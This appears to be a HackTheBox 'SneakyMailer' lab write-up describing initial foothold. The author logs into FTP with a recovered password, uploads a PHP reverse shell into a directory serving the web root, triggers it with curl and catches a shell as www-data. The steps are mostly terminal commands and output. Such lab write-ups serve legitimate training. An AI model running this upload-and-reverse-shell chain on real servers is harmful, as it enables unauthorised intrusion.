InfoSec LAB

SneakyMailer_Exploitation

Created: 2 min read

Arbitrary File Upload

A list of usernames and emails were discovered during the web enumeration, which led to compromising an email account through a phishing campaign. The user behind the compromised email had requested a password reset. I was able to authenticate to the FTP server using the reset credential. The FTP server, turns out, had a directory serving the web root of dev.sneakycorp.htb

Here, I will gain a foothold to the target system by placing a reverse shell in the dev directory of the FTP server, which is mirroring/serving dev.sneakycorp.htb

┌──(kali㉿kali)-[~/archive/htb/labs/sneakymailer]
└─$ ftp $IP               
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
name (10.10.10.197:kali): developer
331 Please specify the password.
password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd dev
250 Directory successfully changed.
ftp> put shell.php 
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||9821|)
150 Ok to send data.
100% |*******************************************************************************************|  9284       91.27 mib/s    00:00 ETA
226 Transfer complete.
9284 bytes sent in 00:00 (149.87 KiB/s)

Uploading the payload to the dev directory of the FTP server

┌──(kali㉿kali)-[~/archive/htb/labs/sneakymailer]
└─$ curl -s 'http://dev.sneakycorp.htb/shell.php'

Triggering the payload

┌──(kali㉿kali)-[~/archive/htb/labs/sneakymailer]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.197] 34724
socket: Shell has connected! PID: 9912
whoami
www-data
hostname
sneakymailer
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.197  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:f04c  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:f04c  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:f0:4c  txqueuelen 1000  (Ethernet)
        RX packets 3047219  bytes 575460458 (548.8 MiB)
        RX errors 0  dropped 10  overruns 0  frame 0
        TX packets 3038105  bytes 1122585820 (1.0 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 176887  bytes 20039480 (19.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 176887  bytes 20039480 (19.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the www-data user via arbitrary file upload

Interactive Graph View

Backlinks